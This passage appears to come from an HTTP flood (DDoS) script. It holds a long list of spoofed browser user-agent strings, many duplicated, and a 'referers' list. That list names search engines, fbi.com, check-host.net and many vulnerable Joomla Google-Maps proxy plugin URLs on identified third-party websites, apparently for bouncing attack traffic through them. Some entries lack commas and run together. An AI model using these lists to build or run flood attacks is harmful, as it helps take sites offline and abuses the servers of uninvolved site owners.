'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
referers = [
'http://help.baidu.com/searchResult?keywords=',
'http://www.bing.com/search?q=',
'http://www.alltheweb.com/help/webmaster/crawler',
'http://gais.cs.ccu.edu.tw/robot.php', 'http://www.googlebot.com/bot.html',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=', 'https://www.fbi.com/',
'http://search.aol.com/aol/search?q=',
'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'https://drive.google.com/viewerng/viewer?url=',
'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'https://replit.com/', 'https://check-host.net/', 'https://obaspro.my.id/',
'http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url='
'http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url='
'http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url=',
'http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=',
'http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS',
'http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=',
'http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url='
'http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url=',
'http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url=',
